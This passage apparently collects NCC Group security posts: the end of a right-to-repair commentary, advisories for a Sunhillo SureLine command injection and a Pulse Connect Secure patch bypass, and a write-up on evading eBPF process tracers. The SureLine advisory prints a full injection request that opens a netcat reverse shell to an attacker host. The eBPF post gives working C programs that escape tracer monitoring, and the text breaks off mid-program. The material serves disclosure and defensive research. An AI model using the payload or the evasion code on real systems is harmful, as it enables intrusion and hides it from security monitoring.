  2. Disable remote features upon reaching a clearly communicated EOL date. While such an attack surface reduction is responsible to the safety of the internet as a whole, this is not likely to thrill individual customers who may be reliant on that functionality. This path was taken by Sonos which caused significant unrest among owners.
  3. Require owners and users to explicitly accept the risk of running obsolete technology in an unsafe, unmaintained fashion. There is an obvious difficulty in properly communicating this to the owners in a way that lets them make informed decisions (i.e. not all consumers are equally literate with technology).
  4. Turn it over to the community to allow maintenance to continue. Many companies open source their products when they are no longer commercially viable and this allows owners and hobbyists to continue the maintenance. This may require releasing firmware signing keys, and may require permissive licenses for any third party components. This assumes of course that the OEM still has all these artefacts, as maintaining digital information for decades poses its own challenges. Here Escrow solutions exist that can help.

Regardless of the chosen solution, clear communication to the owners of the expected EOL date of the product, and in particular the security expiration date, is a must.

Timelines

The proposed 60 day implementation is significantly out of sync with typical product development timelines. For most electronic devices, the typical product development cycle can take 6-12 months, and this assumes relatively simple iteration on previous designs. For products that contain more fundamental improvements, it can take years. For complex semiconductor products, development cycles can easily be 10 years or more. 

This discrepancy makes compliance on new products very challenging, considering the foundational nature of the changes that may be required to comply without adversely affecting the security of the users (by, say, unintentionally releasing dangerous tools). Even conceptually simple tasks such as scrubbing firmware log statements to remove sensitive information can be quite time consuming.

Moreover, nothing in the proposal indicates that this is to be applicable to new products only. Implementation on existing products is assumed, and this may require even more drastic actions by the OEM (such as the severely unsafe option of releasing code signing keys to both owners and attackers).

The proposed timeline is therefore expected to generate significant pushback from the OEMs. A better approach would have been to phase in the changes over a number of years, and grandfather existing products which may be uneconomical or technically impossible to support.

Closing Thoughts

It is abundantly clear that the right to repair movement is here to stay. Having visible support from the current US federal administration gives it some real momentum that is unwise to ignore. We recommend that OEMs begin working on solutions to comply sooner rather than later, because even if the current proposal does not pass into law, there will be others, and eventually compliance in one form or another, in some jurisdiction, is likely to be required. Having a low-friction compliance plan will become ever more important in the years to come.

Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection (CVE-2021-36380)

26 July 2021 at 15:28
Vendor: Sunhillo 
Vendor URL: https://www.sunhillo.com/ 
Versions affected: SureLine <= 8.7.0 
Systems Affected: Any using SureLine 
Author: Liam Glanfield <[email protected]> 
Advisory URL / CVE Identifier: CVE-2021-36380 
Risk: Critical - complete compromise of the host

Summary

Sunhillo is an industry leader in surveillance data distribution. The Sunhillo SureLine application contained an unauthenticated operating system (OS) command injection vulnerability that allowed an attacker to execute arbitrary commands with root privileges. This would have allowed for a threat actor to establish an interactive channel, effectively taking control of the target system.

Impact

Complete system compromise. With the threat actor in full control of the device they could cause a denial of service or utilise the device for persistence on the network.

Details

The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.

The script did appear to validate user input and blocked most techniques for OS command injection. Additionally, the request also did not require any authentication (session cookie etc.). However, command injection was still possible using $(), thus enabling arbitrary commands to be run within the parenthesis.

The following parameters were affected:

  • ipAddr
  • dnsAddr

The following lines demonstrate the creation of a reverse connection to an attacker’s host, leading to the establishment of a covert channel, effectively allowing an attacker to execute commands on the server. The installed ‘nc’ package (Netcat) is used to create a reverse connection to an attacker’s host (192.168.1.2) on port TCP/8181 while redirecting all traffic (stdout and stderr) to and from the /bin/bash shell.

POST /cgi/networkDiag.cgi HTTP/1.1 
Host: 192.168.1.1 
Content-Length: 145 

command=2&ipAddr=&dnsAddr=$(nc+-e+/bin/bash+192.168.1.2+8181)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=

The code above would send the shell to an attacker’s host, which in this case should have port 8181 in listening mode. This was compounded further by the web service running as root; with an interactive shell now established, the attacker would be in full control of the system. For example, the attacker could add an SSH public key to /home/root/.ssh/authorized_keys and gain access as the root user.

Recommendation

Update Sunhillo SureLine to version 8.7.0.1.1.

Vendor Communication

NCC Group Notifies Vendor: 21st June 2021 
Vendor Replies Requesting More Details: 21st June 2021 
NCC Group Sends Requested information: 21st June 2021 
Vendor Confirms The Vulnerability: 28th June 2021 
NCC Group Requests a Patch Date: 28th June 2021 
Vendor Response With Date: 7th July 2021 
Patch Published: 22nd July 2021 
Advisory Published: 26th July 2021

Thanks to

Liam Glanfield at NCC Group

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Publish Date: 7/26/2021

Written by: Liam Glanfield

Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive Extraction – CVE-2021-22937 (Patch Bypass)

5 August 2021 at 15:59
Vendor: Ivanti Pulse Secure
Vendor URL: https://www.pulsesecure.net/
Versions affected: Pulse Connect Secure (PCS) 9.11R11.5 or below
Systems Affected: Pulse Connect Secure (PCS) Appliances
Author: Richard Warren <richard.warren[at]nccgroup[dot]trust>
Advisory URL: https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858
CVE Identifier: CVE-2021-22937
Risk: 7.2 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

The Pulse Connect Secure appliance suffers from an uncontrolled archive extraction vulnerability which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root.

This vulnerability is a bypass of the patch for CVE-2020-8260.

Impact

Successful exploitation of this issue results in Remote Code Execution on the underlying Operating System with root privileges. An attacker with such access will be able to circumvent any restrictions enforced via the web application, as well as remount the filesystem, allowing them to create a persistent backdoor, extract and decrypt credentials, compromise VPN clients, or pivot into the internal network.

Details

The Pulse Connect Secure appliance suffers from an uncontrolled archive extraction vulnerability which allows an attacker to write executable files within the /home/runtime/tmp/tt/ directory, resulting in Remote Code Execution. PCS allows administrative users to import archived configurations. These configurations are compressed using GZIP and encrypted using a hardcoded key, allowing the attacker to encrypt and decrypt their own crafted archive files. When these archives are imported via the administrative GUI, extraction takes place in an unsafe manner, leading to arbitrary file (over)write.

Whilst this issue was patched by adding validation to extracted files, this validation does not apply to archives with the “profiler” type. Therefore, by simply modifying the original CVE-2020-8260 exploit to change the archive type to “profiler”, the patch can be bypassed, and code execution achieved.

Root Cause Analysis

In October 2020, Pulse Secure released PCS version 9.1R9, which patched the CVE-2020-8260 vulnerability. The patch added a new function named DSConfig::validateTarFile. When archives are imported via DSConfig::importConfigImpl, the contents of the uploaded config archive are listed using the tar -tvf command and placed into a file named /tmp/filelist. The validateTarFile function is then called, providing a list of safe files which should be expected inside an uploaded archive.

The validateTarFile function parses the output in /tmp/filelist, and ensures:

  • The archive does not contain any symlinks or hardlinks.
  • The archive contains only the expected files.
  • No files contain ../ in their name.

This added check prevented exploitation of CVE-2020-8260.

In May 2021, Ivanti released PCS version 9.1R11.4, which addressed a number of vulnerabilities which had been exploited in-the-wild. According to the release notes, a vulnerability which sounded very similar to CVE-2020-8260 was also addressed:

Diffing PCS versions 9.1R10 and 9.1R11.4 we could see that calls to DSConfig::checkTarSafe had been added to a number of CGI files:

This additional validation was added to the following CGIs:

  • /dana-admin/cert/clientauthcert.cgi
  • /dana-admin/cert/admincert.cgi
  • /dana-admin/mobile/smimeCert.cgi

Just like the check in DSConfig::importConfigImpl, the checkTarSafe function first lists the files within the uploaded archive before calling validateTarFile.

From this we could identify that CVE-2021-22900 was a variant of CVE-2020-8260. By changing the original exploit to POST to these CGI files instead, we could achieve code execution on PCS < 9.1R11.4.

Due to the existence of these variants within the import feature(s), we thought it would be a good idea to carry out further variant and patch analysis to see if it was still possible to exploit the extraction vulnerability elsewhere.

Reviewing the code within import.cgi, we could see that config imports are processed via DSConfig::importConfig, which is passed the uploaded file-path and some other options, including the archive type:

Within importConfig, we could see that it either calls importConfigImpl or importProfilerDatabase, depending on the archive type supplied by the user:

As demonstrated earlier, importConfigImpl contains a call to validateTarFile, however importProfilerDatabase did not contain this check before the tar -C command is executed:

Therefore, by changing the uploaded archive type to “profiler”, the patch for CVE-2020-8260 could be bypassed.

Proof of Concept

A Proof of Concept was developed to achieve Remote Code Execution as the root user, simply by changing a single POST parameter variable in the original CVE-2020-8260 exploit.

Recommendation

Upgrade to Pulse Connect Secure (PCS) 9.1R12, or later.

Vendor Communication

2021-05-12 – Reported to Pulse Secure via HackerOne.
2021-05-13 – Acknowledgement of submission from HackerOne received - awaiting triage.
2021-05-25 – Requested an update via HackerOne - no response.
2021-06-22 – Confirmed that the exploit still works on newly released PCS 9.1R11.5 version. Shared a screenshot via HackerOne ticket and requested a further update - no response.
2021-07-15 – Emailed Ivanti/Pulse Secure PSIRT & updated HackerOne ticket informing them that the vulnerability will be publicly disclosed on 2021-07-23, as per our disclosure policy (if a vendor is unresponsive).
2021-07-15 – Reply received from Ivanti PSIRT via email. Requested that we hold off disclosure and requested further details of the vulnerability (due to lack of access to HackerOne).
2021-07-15 – Vulnerability details shared with Ivanti PSIRT via PGP email.
2021-07-20 – Ivanti PSIRT confirm they were able to verify the report and plan to release a fix by August 2nd.
2021-07-20 – We agree to hold off disclosure until after the updated version is released.
2021-07-31 – Ivanti confirm the fix will be released in PCS 9.1R12, which is scheduled for August 2nd, and request that we don’t publish the advisory until August 5th.
2021-08-02 – Pulse Connect Secure 9.1R12 released.
2021-08-05 – Advisory published.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2021-08-05

Written by:  Richard Warren

Some Musings on Common (eBPF) Linux Tracing Bugs

6 August 2021 at 04:54

Having been in the game of auditing kprobe-based tracers for the past couple of years, and in light of this upcoming DEF CON talk on eBPF tracer race conditions (which you should go watch) being given by a friend of mine from the NYU(-Poly) (OSIR)IS(IS) lab, I figured I would wax poetic on some of the more amusing issues that tracee, Aqua Security’s “Runtime Security and Forensics” framework for Linux, used to have, and other general issues that anyone attempting to write a production-ready tracer should be aware of. These come up frequently whenever we’re looking at Linux tracers. This post assumes some familiarity with writing eBPF-based tracing tools; if you haven’t played with eBPF yet, consider poking around your kernel and system processes with bpftrace or bcc.

tl;dr In this post, we discuss an insecure coding pattern commonly used in system observability and program analysis tools, and several techniques that can enable one to evade observation from such tools using that pattern, especially when they are being used for security event analysis. We also discuss several ways in which such software can be written that do not enable such evasion, and the current limitations that make it more difficult than necessary to write such code correctly.

fork(2)/clone(2) et al Considered Harmful

As we’ve mentioned before,1 one does not simply trace fork(2) or clone(2) because the child process is actually started (from a CoW snapshot of the caller process) before the syscall has actually returned to the caller. To do so would be a problem, as any tracer that waits for the return value of fork(2)/clone(2)/etc. to start watching the PID will invariably lose some of the initial operations of the child >99% of the time. While this is not a “problem” for most applications’ behavior, it becomes troublesome for monitoring systems based on following individual process hierarchies live instead of all processes globally, retroactively, as anyone can simply “double-fork” in rapid succession to throw off the yoke of inspection, since the second fork(2) will be missed ~100% of the time (even when implementing the bypass in C).

// $ gcc -std=c11 -Wall -Wextra -pedantic -o double-fork double-fork.c
// $ ./double-fork <iterations> </path/to/binary>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char** argv, char** envp) {
  if (argc < 3) {
    return 1;
  }

  int loop = atoi(argv[1]);

  for (int i=0; i < loop; i++) {
    pid_t p = fork();
    if (p != 0) {
      return 0;
    }
  }

  return execve(argv[2], &argv[2], envp);
}
/tracee/dockerer/tracee.main/dist # ./tracee --trace process:follow --filter pid=48478 -e execve -e clone
TIME(s)        UID    COMM             PID     TID     RET              EVENT                ARGS
111506.067379  0      bash             0       0       50586            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F56929630BF, tls: 0
111506.069569  0      bash             0       0       0                execve               pathname: ./double-fork, argv: [./double-fork 100 /usr/bin/id]
111506.077553  0      double-fork      0       0       50590            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0
111506.079220  0      double-fork      0       0       50592            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0
...
111506.142778  0      double-fork      0       0       50690            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0
111506.143236  0      double-fork      0       0       0                execve               pathname: /usr/bin/id, argv: [/usr/bin/id]
...
111514.289461  0      bash             0       0       50699            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F56929630BF, tls: 0
111514.293312  0      bash             0       0       0                execve               pathname: ./double-fork, argv: [./double-fork 100 /usr/bin/id]
111514.303955  0      double-fork      0       0       50700            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0
111514.304240  0      double-fork      0       0       50701            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0
...
111514.356522  0      double-fork      0       0       50799            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0
111514.356949  0      double-fork      0       0       0                execve               pathname: /usr/bin/id, argv: [/usr/bin/id]
...
111519.410500  0      double-fork      0       0       50836            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F533D0A10BF, tls: 0
111519.411117  0      double-fork      0       0       50837            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F533D0A10BF, tls: 0

The start of child execution is triggered from the wake_up_new_task() function called by _do_fork() (now kernel_clone()), which is the internal kernel function powering all of the fork(2)/clone(2) alikes.

pid_t kernel_clone(struct kernel_clone_args *args)
{
  ...
  /*
   * Do this prior waking up the new thread - the thread pointer
   * might get invalid after that point, if the thread exits quickly.
   */
  trace_sched_process_fork(current, p);

  pid = get_task_pid(p, PIDTYPE_PID);
  nr = pid_vnr(pid);

  if (clone_flags & CLONE_PARENT_SETTID)
    put_user(nr, args->parent_tid);

  if (clone_flags & CLONE_VFORK) {
    p->vfork_done = &vfork;
    init_completion(&vfork);
    get_task_struct(p);
  }

  wake_up_new_task(p);
  ...

In our talk (slides 24-25), we gave a bpftrace example of a fork-exec tracer that would not lose to race conditions.

kprobe:wake_up_new_task {
  $chld_pid = ((struct task_struct *)arg0)->pid;
  @pids[$chld_pid] = nsecs;
}

tracepoint:syscalls:sys_enter_execve {
  if (@pids[pid]) {
    $time_diff = ((nsecs - @pids[pid]) / 1000000);
    if ($time_diff <= 10) {
      printf("%s => ", comm);
      join(args->argv);
    }
  }
  delete(@pids[pid]);
}

In general, we prefer to hook wake_up_new_task() with a kprobe since it’s fairly stable and gives raw access to the entire fully-configured child struct task_struct* right before it is started. However, if one does not care about other metadata accessible from that pointer, nor need it to be fully initialized (i.e. if they just want the PID), they can hook the sched_process_fork tracepoint event, which is triggered by the trace_sched_process_fork(current, p) call shown above. This is what tracee currently opts to do as of commit 8c944cf07f15045f395f7754f92b7809316c681c/tag v0.5.4.
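As a rough illustration of the tracepoint-based approach (a sketch only, not tracee’s actual handler), an eBPF program attached to sched_process_fork can record the child’s host PID before the child is ever scheduled. The snippet below borrows tracee-style conventions (SEC, READ_KERN and the traced_pids_map referenced elsewhere in this post):

SEC("raw_tracepoint/sched_process_fork")
int tracepoint__sched__sched_process_fork(struct bpf_raw_tracepoint_args *ctx)
{
    // For this tracepoint: args[0] = parent task_struct*, args[1] = child task_struct*
    struct task_struct *parent = (struct task_struct *)ctx->args[0];
    struct task_struct *child = (struct task_struct *)ctx->args[1];

    u32 parent_pid = READ_KERN(parent->tgid);
    u32 child_pid = READ_KERN(child->tgid);

    // Only start following children whose parent is already being traced.
    if (bpf_map_lookup_elem(&traced_pids_map, &parent_pid) != NULL) {
        bpf_map_update_elem(&traced_pids_map, &child_pid, &child_pid, BPF_ANY);
    }

    return 0;
}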

Additionally, the problems of tracing the fork(2)/clone(2)/etc. syscalls directly led to (and still lead to, in any tracers not hooking wake_up_new_task/sched_process_fork) other issues that can present bypasses in the scenario of live child process observation.

PID Namespaces

The most interesting of these issues is that fork(2)/clone(2)/etc. return PIDs within the context of the PID namespace of the process (thread). As a result, the return values of these syscalls cannot meaningfully be used by a kernel-level tracer without also accounting for child pidns PID to host PID mappings. In distros that allow unprivileged user namespaces to be created, this allows an arbitrary process to create nested PID namespaces by first creating a nested user namespace. This can be done in a number of ways, such as via unshare(2), setns(2), or even clone(2) with CLONE_NEWUSER and CLONE_NEWPID.

root@host:~# su -s /bin/bash nobody
nobody@host:/root$ unshare -Urpf --mount-proc
root@host:/root# nano &
[1] 18
root@host:/root# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.1  0.0   8264  5156 pts/0    S    01:37   0:00 -bash
root          17  0.0  0.0   7108  4132 pts/0    T    01:38   0:00 nano
root          18  0.0  0.0   8892  3344 pts/0    R+   01:38   0:00 ps aux
root@host:/root# unshare -pf --mount-proc
root@host:/root# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  1.2  0.0   8264  5200 pts/0    S    01:38   0:00 -bash
root          15  0.0  0.0   8892  3332 pts/0    R+   01:38   0:00 ps aux
// $ gcc -std=c11 -Wall -Wextra -pedantic -o userns-clone-fork userns-clone-fork.c
// $ ./userns-clone-fork </path/to/binary>

#define _GNU_SOURCE
#include <sched.h>

#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int clone_child(void *arg) {
  char** argv = (char**)arg;

  printf("clone pid: %u\n", getpid());

  pid_t p = fork();
  if (p != 0) {
    return 0;
  }

  printf("fork pid: %u\n", getpid());

  return execve(argv[1], &argv[1], NULL);
}

static char stack[1024*1024];

int main(int argc, char **argv) {
  if (argc < 2) {
    return 1;
  }

  printf("parent pid: %u\n", getpid());

  pid_t p = clone(clone_child, &stack[sizeof(stack)], CLONE_NEWUSER|CLONE_NEWPID, argv);
  if (p == -1) {
    perror("clone");
    exit(1);
  }

  return 0;
}
/tracee/dockerer/tracee.main/dist # ./tracee --trace process:follow --filter pid=54519 -e execve -e clone
TIME(s)        UID    COMM             PID     TID     RET              EVENT                ARGS
117174.563477  0      bash             0       0       55395            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F99617200BF, tls: 0
117174.566597  0      bash             0       0       0                execve               pathname: ./userns-clone-fork, argv: [./userns-clone-fork /usr/bin/id]
117174.578037  0      userns-clone-fo  0       0       55396            clone                flags: CLONE_NEWUSER|CLONE_NEWPID, stack: 0x5621B2DBB030, parent_tid: 0x0, child_tid: 0x7F7C130B6285, tls: 18
117174.579600  0      userns-clone-fo  0       0       2                clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F7C1307A0BF, tls: 0

However, more interestingly, this means that such tracers will not work by default on containers unless the containers run within the host PID namespace, a dangerous configuration. This was the behavior we observed with tracee prior to the aforementioned commit 8c944cf07f15045f395f7754f92b7809316c681c.

clone3(2) also Considered Harmful

Prior to tracee 0.5.4, the PID return values of fork(2)/clone(2)-like syscalls were processed with the following code:

SEC("raw_tracepoint/sys_exit")
int tracepoint__raw_syscalls__sys_exit(struct bpf_raw_tracepoint_args *ctx)
{
    long ret = ctx->args[1];
    struct task_struct *task = (struct task_struct *)bpf_get_current_task();
    struct pt_regs *regs = (struct pt_regs*)ctx->args[0];
    int id = READ_KERN(regs->orig_ax);

    ...

    // fork events may add new pids to the traced pids set
    // perform this check after should_trace() to only add forked childs of a traced parent
    if (id == SYS_CLONE || id == SYS_FORK || id == SYS_VFORK) {
        u32 pid = ret;
        bpf_map_update_elem(&traced_pids_map, &pid, &pid, BPF_ANY);
        if (get_config(CONFIG_NEW_PID_FILTER)) {
            bpf_map_update_elem(&new_pids_map, &pid, &pid, BPF_ANY);
        }
    }

In the above snippet, the syscall ID is compared against those of clone(2), fork(2), and vfork(2). However, the syscall is not compared against the ID of clone3(2). While tracee does separately log clone3(2) events (since commit f44eb206bf8e80efeb1da68641cb61f3f00c522c/tag v0.4.0), the above omission resulted in clone3(2)-created child processes not being followed prior to commit 8c944cf07f15045f395f7754f92b7809316c681c.

// $ gcc -std=c11 -Wall -Wextra -pedantic -o clone3 clone3.c
// $ ./clone3 </path/to/binary>

#define _GNU_SOURCE
#include <sched.h>

#include <linux/sched.h>
#include <linux/types.h>

#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/syscall.h>

int clone_child(void *arg) {
  char** argv = (char**)arg;

  return execve(argv[1], &argv[1], NULL);
}

int main(int argc, char **argv) {
  if (argc < 2) {
    return 1;
  }

  printf("parent pid: %u\n", getpid());

  struct clone_args args = {0};
  pid_t p = syscall(__NR_clone3, &args, sizeof(struct clone_args));

  if (p == -1) {
    perror("clone3");
    return 1;
  }

  if (p != 0) {
    printf("clone pid: %u\n", p);
  } else {
    clone_child(argv);
  }

  return 0;
}

Since that commit, which introduces the change to use sched_process_fork, tracee now obtains both the host PID and in-namespace PID:

SEC("raw_tracepoint/sched_process_fork")
int tracepoint__sched__sched_process_fork(struct bpf_raw_tracepoint_args *ctx)
{
    // Note: we don't place should_trace() here so we can keep track of the cgroups in the system
    struct task_struct *parent = (struct task_struct*)ctx->args[0];
    struct task_struct *child = (struct task_struct*)ctx->args[1];

    int parent_pid = get_task_host_pid(parent);
    int child_pid = get_task_host_pid(child);

    ...

    if (event_chosen(SCHED_PROCESS_FORK) && should_trace()) {
       ... 
        int parent_ns_pid = get_task_ns_pid(parent);
        int child_ns_pid = get_task_ns_pid(child);

        save_to_submit_buf(submit_p, (void*)&parent_pid, sizeof(int), INT_T, DEC_ARG(0, *tags));
        save_to_submit_buf(submit_p, (void*)&parent_ns_pid, sizeof(int), INT_T, DEC_ARG(1, *tags));
        save_to_submit_buf(submit_p, (void*)&child_pid, sizeof(int), INT_T, DEC_ARG(2, *tags));
        save_to_submit_buf(submit_p, (void*)&child_ns_pid, sizeof(int), INT_T, DEC_ARG(3, *tags));

        events_perf_submit(ctx);
    }

    return 0;
}

TOCTTOU Issues Endemic to Lightweight Tracers

In our CCC talk2,3 we discussed how there exists a significant time-of-check-to-time-of-use (TOCTTOU) race condition when hooking a syscall entrypoint (e.g. via a kprobe, but also more generally), as userland-supplied data that is copied/processed by the hook may change by the time the kernel accesses it as part of the syscall’s implementation.

The main way to get around this issue is to hook internal kernel functions, tracepoints, or LSM hooks to access syscall inputs after they have already been copied into kernel memory (and probe the in-kernel version). However, this approach is not universally applicable and only works in the presence of such internal anchor points. Where those do not exist, one has to rely on the Linux Auditing System (aka auditd), which, in addition to simple raw syscall argument dumps, has its calls directly interleaved within the kernel’s codebase to process and log inputs after they have been copied from user memory for processing by the kernel. auditd’s calls are very carefully (read: fragilely) placed to ensure that values used for filtering and logging are not subject to race conditions, even in the cases where data is being read from user memory.

auditd: The “d” Stands for Dancing

For example, auditd’s execve(2) logging takes the following form for a simple ls -lht /:

type=EXECVE msg=audit(...): argc=4 a0="ls" a1="--color=auto" a2="-lht" a3="/"

This log line is generated by audit_log_execve_info() from apparent userspace memory:

  const char __user *p = (const char __user *)current->mm->arg_start;
  ...
      len_tmp = strncpy_from_user(&buf_head[len_buf], p,
                                  len_max - len_buf);

However, we can observe that the execve(2) argument handling of auditd is “safe” with the following bpftrace script which hooks some of the functions called during an execve(2) syscall that have symbols:

kprobe:__audit_bprm { printf("__audit_bprm called\n"); }
kprobe:setup_arg_pages { printf("setup_arg_pages called\n"); }
kprobe:do_open_execat { printf("do_open_execat called\n"); }
kprobe:open_exec { printf("open_exec(\"%s\") called\n", str(arg0)); }
kprobe:security_bprm_creds_for_exec { printf("security_bprm_creds_for_exec called\n"); }
# bpftrace trace.bt 
Attaching 5 probes...
do_open_execat called
security_bprm_creds_for_exec called
open_exec("/lib64/ld-linux-x86-64.so.2") called
do_open_execat called
setup_arg_pages called
__audit_bprm called

The first do_open_execat() call is that from bprm_execve(), which is called from do_execveat_common(), right after argv is copied into the struct linux_binprm. setup_arg_pages is called from within a struct linux_binfmt implementation and sets current->mm->arg_start to bprm->p. And then lastly, __audit_bprm() is called (from exec_binprm(), itself called from bprm_execve()), which sets the auditd context type to AUDIT_EXECVE, resulting in audit_log_execve_info() being called from audit_log_exit() (via show_special()) to generate the above type=EXECVE log line.

It goes without saying that this is not really something that eBPF code could hope to do in any sort of stable manner. One could try to use eBPF to hook a bunch of the auditd related functions in the kernel, but that probably isn’t very stable either and any such code would essentially need to re-implement just the useful parts of auditd that extract inputs, process state, and system state, and not the cruft (slow filters, string formatting, and who knows what else) that results in auditd somehow having a syscall overhead upwards of 245%.4

eBPF Doesn’t Like to Share

Instead of trying to hook onto __audit_* symbols called only when auditd is enabled, we should probably try to find relevant functions or tracepoints in the same context to latch onto, such as trace_sched_process_exec in the case of execve(2).

static int exec_binprm(struct linux_binprm *bprm)
{
  ...
  audit_bprm(bprm);
  trace_sched_process_exec(current, old_pid, bprm);
  ptrace_event(PTRACE_EVENT_EXEC, old_vpid);
  proc_exec_connector(current);
  return 0;
}
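
Purely as an illustration (this is a minimal sketch and not tracee's or auditd's implementation), a raw tracepoint hook on sched_process_exec can read the executed path from the in-kernel struct linux_binprm. The sketch below assumes a libbpf CO-RE build environment providing a generated vmlinux.h; the program and variable names are arbitrary:

// exec_hook.bpf.c - minimal sketch of a sched_process_exec raw tracepoint hook.
// Assumes a libbpf CO-RE build providing vmlinux.h; illustrative only.
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_core_read.h>

char LICENSE[] SEC("license") = "GPL";

SEC("raw_tracepoint/sched_process_exec")
int handle_sched_process_exec(struct bpf_raw_tracepoint_args *ctx)
{
    // TP_PROTO(struct task_struct *p, pid_t old_pid, struct linux_binprm *bprm)
    struct linux_binprm *bprm = (struct linux_binprm *)ctx->args[2];
    char filename[128];

    // bprm->filename is kernel memory already populated by the exec machinery,
    // so it cannot be clobbered from userspace at this point.
    const char *name = BPF_CORE_READ(bprm, filename);
    bpf_probe_read_kernel_str(filename, sizeof(filename), name);
    bpf_printk("exec: %s", filename);

    return 0;
}

Because bprm has already been populated by the kernel by the time this tracepoint fires, the filename read here is the one the kernel actually used, rather than whatever currently resides in user memory.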

As it turns out, trace_sched_process_exec is even more necessary than one might initially think. While race conditions when hooking syscalls via kprobes and tracepoints are troublesome, it turns out that userspace can flat out block eBPF from reading syscall inputs if they reside in MAP_SHARED pages. It is worth noting that such tomfoolery is somewhat limited as it only works against bpf_probe_read(|_user|_kern) calls made before a page is read by the kernel in a given syscall handler. As a result, a quick “fix” for tracers is to perform such reads when the syscall returns. However, such a “fix” would increase the feasibility of race condition abuse whenever the syscall implementation takes longer than the syscall context switch.

Given that this limitation doesn’t appear to be that well known, it could be a bug in the kernel, but it only presents an issue when one is already writing their eBPF tracers in the wrong manner. tracee is not generally vulnerable to MAP_SHARED abuse because it mostly dumps syscall arguments from a raw tracepoint hook on sys_exit. However, for syscalls that don’t normally return, such as execve(2), it resorts to dumping the arguments in its sys_enter raw tracepoint hook, enabling the syscall event to be fooled. Regardless, this is also not an issue for tracee as it implements a hook for the sched_process_exec tracepoint as of commit 6166346e7479bc3b4b417a67a92a2493a30b949e/tag v0.6.0.

// $ gcc -std=c11 -Wall -Wextra -pedantic -o clobber clobber.c -lpthread

#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <pthread.h>

static char* checker;
static char* key;

static int mode = 1;

//force byte by byte copies
void yoloncpy(volatile char* dst, volatile char* src, size_t n, int r) {
  if (r == 0) {
    for (size_t i = 0; i < n; i++) {
      dst[i] = src[i];
    }
  } else {
    for (size_t i = n; i > 0; i--) {
      dst[i-1] = src[i-1];
    }
  }
}

void* thread1(void* arg) {
  int rev = (int)(uintptr_t)arg;
  uint64_t c = 0;
  while(1) {//c < 8192) {
    switch (c%2) {
      case 0: {
        yoloncpy(key, "supergood", 10, rev);
        break;
      }
      case 1: {
        yoloncpy(key, "reallybad", 10, rev);
        break;
      }
    }
    c += 1;
  }
  return NULL;
}

void* thread2(void* arg) {
  (void)arg;
  uint64_t c = 0;
  while(1) {
    switch (c%2) {
      case 0: {
        memcpy(key, "supergood", 10);
        break;
      }
      case 1: {
        memcpy(key, "reallybad", 10);
        break;
      }
    }
    c += 1;
  }
  return NULL;
}

int main(int argc, char** argv, char** envp) {

  if (argc < 2) {
    printf("usage: %s <count> [mode]\n", argv[0]);
    return 1;
  }

  int count = atoi(argv[1]);

  if (argc >= 3) {
    mode = atoi(argv[2]);
    if (mode != 1 && mode != 2) {
      printf("invalid mode: %s\n", argv[2]);
      return 1;
    }
  }

  key = mmap(NULL, 32, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  if (key == MAP_FAILED) {
    perror("mmap");
    return 1;
  }
